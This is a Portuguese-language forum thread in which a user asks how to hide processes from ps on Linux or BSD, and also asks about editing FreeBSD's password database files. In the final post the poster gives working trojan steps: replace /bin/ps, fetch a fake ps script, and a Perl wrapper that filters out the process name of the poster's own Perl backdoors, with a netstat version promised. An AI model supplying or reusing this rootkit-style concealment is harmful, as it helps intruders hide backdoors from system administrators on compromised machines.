+ Responder ao Tópico



  1. #1

    Padrão Esconder processo ps aux

    Galera Under-linux!
    alguem sabe como esconder o processo do ps , mudar o nome algo assim!
    tem um programa nao lembro nome q faz isso mais estou querendo fazer com as ferramentas do proprio sistema!vi uns artigos mais nao funfou!rs
    seja BSD ou Linux!

    falow

  2. #2

    Padrão

    sabe programar amigo?
    Na revista phrack tem um artugo sobre como esconder processos... procure lá!



  3. #3

    Padrão

    opa.!
    eles falam se nao me engano de alterar o codigo fonte do ps para nao mostrar certo processos e tambem algo com LKM!nao mexo com C!rsrs

    isso ainda to estudando!

    aproveitando!
    tem como editar o arquivo spwd.db e pwd.db é la q fica os verdadeiros arquivo de senha do FreeBSD né?
    tbm to a estudando isso!rsrs

    falow!

    Obrigadao ae cara!

  4. #4

    Padrão

    Alterar os fontes do ps não um método muito legal...
    Eu uso essa técnica para esconder processo em uma honeypot...
    O sujeito pode testar o md5 sum do binário e ver que é uma farça...
    Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...

    Não entendo de BSD's



  5. #5

    Padrão

    Citação Postado originalmente por PEdroArthurJEdi Ver Post
    Alterar os fontes do ps não um método muito legal...
    Eu uso essa técnica para esconder processo em uma honeypot...
    O sujeito pode testar o md5 sum do binário e ver que é uma farça...
    Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...

    Não entendo de BSD's
    Opa cara!

    to criando um script em perl ta funcionando!
    rsrs
    falow

    abrçs!

  6. #6



  7. #7

    Padrão

    Citação Postado originalmente por PEdroArthurJEdi Ver Post
    posta ai pra gente
    Copiamos o ps original para ps.old!

    hacr#mv /bin/ps /bin/ps.old

    Baixando e copiando o Fake PS!

    hacr#fetch Your Page.com
    hacr#mv ps.pl /bin/ps
    hacr#chmod +x /bin/ps

    Obs:Você tem que alterar o script de acordo com sua Backdoor!

    No meu caso minhas backdoors são feitas em Perl ae o processo fica com o nome de (perl5.8.8).

    Segue o codigo:

    #!/usr/bin/perl
    #Credits by [email protected]
    use warnings;
    use strict;

    my $string = $ARGV[0];
    if($string){
    my @net = qx/ps.old $string/;
    my @hide = grep(!/(perl5.8.8)/, @net);
    my @dd = grep(!/ps.old/, @hide);
    print @dd;
    }
    else
    {
    my @nett = qx/ps.old/;
    my @hidee = grep(!/(perl5.8.8)/, @nett);
    my @d = grep(!/ps.old/, @hidee);
    print @d;
    }

    no meu blog tbm tem do netstat e to criando do socket!